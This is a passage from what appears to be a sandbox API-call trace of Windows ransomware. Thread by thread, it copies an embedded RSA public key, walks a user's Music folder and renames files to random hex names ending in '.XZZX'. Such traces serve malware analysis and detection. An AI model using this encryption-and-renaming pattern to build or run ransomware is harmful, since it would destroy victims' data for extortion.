Data3=0x4fc1, Data4=([0]=0x82, [1]=0xd4, [2]=0x9f, [3]=0xcb, [4]=0x59, [5]=0xe7, [6]=0x8f, [7]=0x8a))) returned 0x0 [0241.370] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\C1C4370F268A7D85910C485D2AAB61CD.XZZX") returned 77 [0241.370] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0241.370] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\A13F395C15FD8116A8459B4A18B8655E.XZZX") returned 77 [0241.370] StrStrW (lpFirst="C1C4370F268A7D85910C485D2AAB61CD.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 956 os_tid = 0x11f8 [0241.526] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0241.526] lstrcpyW (in: lpString1=0x2baf460, lpString2="D25EF7C41A27D9E43EBB395A1EBABE2C.XZZX" | out: lpString1="D25EF7C41A27D9E43EBB395A1EBABE2C.XZZX") returned="D25EF7C41A27D9E43EBB395A1EBABE2C.XZZX" [0241.526] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0241.526] SetErrorMode (uMode=0x1) returned 0x1 [0241.526] lstrcpyW (in: lpString1=0x2baf860, lpString2="D25EF7C41A27D9E43EBB395A1EBABE2C.XZZX" | out: lpString1="D25EF7C41A27D9E43EBB395A1EBABE2C.XZZX") returned="D25EF7C41A27D9E43EBB395A1EBABE2C.XZZX" [0241.526] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x63c55db0, Data2=0xf358, Data3=0x487b, Data4=([0]=0x9a, [1]=0xff, [2]=0xb4, [3]=0x8b, [4]=0x50, [5]=0x25, [6]=0x71, [7]=0x2e))) returned 0x0 [0241.526] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\D25EF7C41A27D9E43EBB395A1EBABE2C.XZZX") returned 77 [0241.526] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0241.526] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\A3C6448044E5AB4863C55DB047A08F90.XZZX") returned 77 [0241.526] StrStrW (lpFirst="D25EF7C41A27D9E43EBB395A1EBABE2C.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 957 os_tid = 0x11fc [0241.682] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0241.682] lstrcpyW (in: lpString1=0x2baf460, lpString2="FAD3BB6308C4FC66694F337D0D31E0AE.XZZX" | out: lpString1="FAD3BB6308C4FC66694F337D0D31E0AE.XZZX") returned="FAD3BB6308C4FC66694F337D0D31E0AE.XZZX" [0241.682] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0241.682] SetErrorMode (uMode=0x1) returned 0x1 [0241.682] lstrcpyW (in: lpString1=0x2baf860, lpString2="FAD3BB6308C4FC66694F337D0D31E0AE.XZZX" | out: lpString1="FAD3BB6308C4FC66694F337D0D31E0AE.XZZX") returned="FAD3BB6308C4FC66694F337D0D31E0AE.XZZX" [0241.682] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x4d832963, Data2=0x113e, Data3=0x4c7d, Data4=([0]=0x95, [1]=0x6f, [2]=0x23, [3]=0x4c, [4]=0x5e, [5]=0xef, [6]=0xa, [7]=0xaa))) returned 0x0 [0241.682] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FAD3BB6308C4FC66694F337D0D31E0AE.XZZX") returned 77 [0241.682] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0241.682] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7B8398FA0526D3464D83296307E1B78E.XZZX") returned 77 [0241.682] StrStrW (lpFirst="FAD3BB6308C4FC66694F337D0D31E0AE.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 958 os_tid = 0x1200 [0241.837] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0241.837] lstrcpyW (in: lpString1=0x2baf460, lpString2="FCD862501902E584E01CEFE81DABC9CC.XZZX" | out: lpString1="FCD862501902E584E01CEFE81DABC9CC.XZZX") returned="FCD862501902E584E01CEFE81DABC9CC.XZZX" [0241.837] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0241.837] SetErrorMode (uMode=0x1) returned 0x1 [0241.837] lstrcpyW (in: lpString1=0x2baf860, lpString2="FCD862501902E584E01CEFE81DABC9CC.XZZX" | out: lpString1="FCD862501902E584E01CEFE81DABC9CC.XZZX") returned="FCD862501902E584E01CEFE81DABC9CC.XZZX" [0241.837] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x89c2a54d, Data2=0xa28a, Data3=0x47c7, Data4=([0]=0x90, [1]=0x7e, [2]=0xd4, [3]=0x5c, [4]=0x70, [5]=0xdc, [6]=0x4a, [7]=0x19))) returned 0x0 [0241.837] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FCD862501902E584E01CEFE81DABC9CC.XZZX") returned 77 [0241.837] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0241.838] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\6F87D5822D929F4689C2A54D304D838E.XZZX") returned 77 [0241.838] StrStrW (lpFirst="FCD862501902E584E01CEFE81DABC9CC.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 959 os_tid = 0x1204 [0241.995] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0241.995] lstrcpyW (in: lpString1=0x2baf460, lpString2="1037641408F8F044B7533AA10D10D48C.XZZX" | out: lpString1="1037641408F8F044B7533AA10D10D48C.XZZX") returned="1037641408F8F044B7533AA10D10D48C.XZZX" [0241.996] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0241.996] SetErrorMode (uMode=0x1) returned 0x1 [0241.996] lstrcpyW (in: lpString1=0x2baf860, lpString2="1037641408F8F044B7533AA10D10D48C.XZZX" | out: lpString1="1037641408F8F044B7533AA10D10D48C.XZZX") returned="1037641408F8F044B7533AA10D10D48C.XZZX" [0241.996] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x23d53e47, Data2=0x49b3, Data3=0x418e, Data4=([0]=0x8e, [1]=0x58, [2]=0xf, [3]=0xa5, [4]=0x7b, [5]=0xc2, [6]=0xa2, [7]=0xec))) returned 0x0 [0241.996] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\1037641408F8F044B7533AA10D10D48C.XZZX") returned 96 [0241.996] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0241.996] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\DCDCCAA512DF544A23D53E47159A3892.XZZX") returned 96 [0241.996] StrStrW (lpFirst="1037641408F8F044B7533AA10D10D48C.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 960 os_tid = 0x1208 [0242.150] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0242.150] lstrcpyW (in: lpString1=0x2baf460, lpString2="23947E243409DC7CAF2C62063821C0C4.XZZX" | out: lpString1="23947E243409DC7CAF2C62063821C0C4.XZZX") returned="23947E243409DC7CAF2C62063821C0C4.XZZX" [0242.150] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0242.150] SetErrorMode (uMode=0x1) returned 0x1 [0242.150] lstrcpyW (in: lpString1=0x2baf860, lpString2="23947E243409DC7CAF2C62063821C0C4.XZZX" | out: lpString1="23947E243409DC7CAF2C62063821C0C4.XZZX") returned="23947E243409DC7CAF2C62063821C0C4.XZZX" [0242.150] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x677392c1, Data2=0x957c, Data3=0x4bca, Data4=([0]=0xbb, [1]=0x9, [2]=0xca, [3]=0xd0, [4]=0x75, [5]=0x2b, [6]=0x1e, [7]=0x6))) returned 0x0 [0242.150] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\23947E243409DC7CAF2C62063821C0C4.XZZX") returned 96 [0242.150] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0242.150] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\60656A7C2C4147D8677392C12EFC2C20.XZZX") returned 96 [0242.150] StrStrW (lpFirst="23947E243409DC7CAF2C62063821C0C4.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 961 os_tid = 0x120c [0242.305] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0242.305] lstrcpyW (in: lpString1=0x2baf460, lpString2="2ADDD7CE37DE6C473ADF3B8E3BFF508F.XZZX" | out: lpString1="2ADDD7CE37DE6C473ADF3B8E3BFF508F.XZZX") returned="2ADDD7CE37DE6C473ADF3B8E3BFF508F.XZZX" [0242.305] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0242.306] SetErrorMode (uMode=0x1) returned 0x1 [0242.306] lstrcpyW (in: lpString1=0x2baf860, lpString2="2ADDD7CE37DE6C473ADF3B8E3BFF508F.XZZX" | out: lpString1="2ADDD7CE37DE6C473ADF3B8E3BFF508F.XZZX") returned="2ADDD7CE37DE6C473ADF3B8E3BFF508F.XZZX" [0242.306] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x6379aa67, Data2=0xa0a9, Data3=0x4772, Data4=([0]=0xb3, [1]=0xee, [2]=0xad, [3]=0x8c, [4]=0x25, [5]=0x9b, [6]=0x10, [7]=0x3f))) returned 0x0 [0242.306] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\2ADDD7CE37DE6C473ADF3B8E3BFF508F.XZZX") returned 96 [0242.306] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0242.306] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\B5D1DDFF2CD66A426379AA672F914E8A.XZZX") returned 96 [0242.306] StrStrW (lpFirst="2ADDD7CE37DE6C473ADF3B8E3BFF508F.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 962 os_tid = 0x1210 [0242.462] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0242.462] lstrcpyW (in: lpString1=0x2baf460, lpString2="51A5A3C031894064FCB3CED0366624AC.XZZX" | out: lpString1="51A5A3C031894064FCB3CED0366624AC.XZZX") returned="51A5A3C031894064FCB3CED0366624AC.XZZX" [0242.462] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0242.462] SetErrorMode (uMode=0x1) returned 0x1 [0242.462] lstrcpyW (in: lpString1=0x2baf860, lpString2="51A5A3C031894064FCB3CED0366624AC.XZZX" | out: lpString1="51A5A3C031894064FCB3CED0366624AC.XZZX") returned="51A5A3C031894064FCB3CED0366624AC.XZZX" [0242.462] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x1a8dbede, Data2=0xc15d, Data3=0x42cd, Data4=([0]=0xaf, [1]=0x60, [2]=0xe, [3]=0x3e, [4]=0x43, [5]=0x1, [6]=0x73, [7]=0x10))) returned 0x0 [0242.462] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\51A5A3C031894064FCB3CED0366624AC.XZZX") returned 96 [0242.462] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0242.462] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\8263B4A63274D1791A8DBEDE352FB5C1.XZZX") returned 96 [0242.462] StrStrW (lpFirst="51A5A3C031894064FCB3CED0366624AC.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 963 os_tid = 0x1214 [0242.618] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0242.618] lstrcpyW (in: lpString1=0x2baf460, lpString2="54E892FC383D1FA0EE2D03953C6A03E8.XZZX" | out: lpString1="54E892FC383D1FA0EE2D03953C6A03E8.XZZX") returned="54E892FC383D1FA0EE2D03953C6A03E8.XZZX" [0242.618] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0242.618] SetErrorMode (uMode=0x1) returned 0x1 [0242.618] lstrcpyW (in: lpString1=0x2baf860, lpString2="54E892FC383D1FA0EE2D03953C6A03E8.XZZX" | out: lpString1="54E892FC383D1FA0EE2D03953C6A03E8.XZZX") returned="54E892FC383D1FA0EE2D03953C6A03E8.XZZX" [0242.618] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0xdc6f13b3, Data2=0x65dd, Data3=0x47ff, Data4=([0]=0xb1, [1]=0xff, [2]=0xe4, [3]=0x65, [4]=0xab, [5]=0x58, [6]=0x25, [7]=0xb6))) returned 0x0 [0242.618] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: 